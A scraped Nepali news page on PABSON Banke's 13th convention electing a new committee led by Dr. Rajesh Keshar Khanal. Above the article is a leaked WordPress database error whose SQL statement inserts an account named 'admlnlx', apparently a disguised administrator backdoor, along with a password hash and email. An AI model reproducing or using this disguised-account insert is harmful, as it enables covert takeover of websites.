WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BH/0.yk90Y2fM819uMdl67ihjuJPHl1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 01:31:36', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस १२-
प्याब्सन बाकेको १३औं अधिवशेनले डा. राजेश केशर खनालको नेतृत्वमा सोमबार सर्वसम्मत नया नेतृत्व चयन गरेको छ । अध्यक्षका तीन दाबेदार बीच अग्रजहरुको परामर्श र पहलबाट सर्वसम्मत नेतृत्व चयन गरिएको प्याब्सन बाकेले जनाएको छ ।
नव चयनित कार्यसमितिमा वरिष्ठ उपाध्यक्ष राजेन्द्र आचार्य, उपाध्यक्ष (महिला) अन्नपूर्णा सिंह, उपाध्यक्ष राजन आले श्रेष्ठ, सचिव यम रावत, कोषाध्यक्ष दिनेश राज शर्मा, सहसचिव रोशन श्रेष्ठ, सहसचिव अनवरुल मुस्तफा(अनवर), सहकोषाध्यक्ष मनोजकुमार गिरी रहेका छन् ।
त्यस्तै, सदस्यमा महिला तर्फ लक्ष्मी सुवेदी र शशी स्वार, सदस्यहरुमा सुमन गौतम, उदय आले, दिनेश सिग्देल, मान बहादुर थापा, इश्वर पोखरेल र भीम बहादुर खड्का चयन भएका छन् । लेखा संयोजक नारायण दत्त उपाध्याय तथा सदस्य आदित्य यादव र विक्रम विष्ट चयन भएको विद्यालय सञ्चालक सतिश निरौलाले जानकारी दिएका छन् ।निवर्तमान कार्यसमितिका अध्यक्ष ऋषिकेश जिसी र सचिव विकास बज्राचार्य प्रदेश कमिटिका लागि प्रतिनिधि चयन भएका छन् ।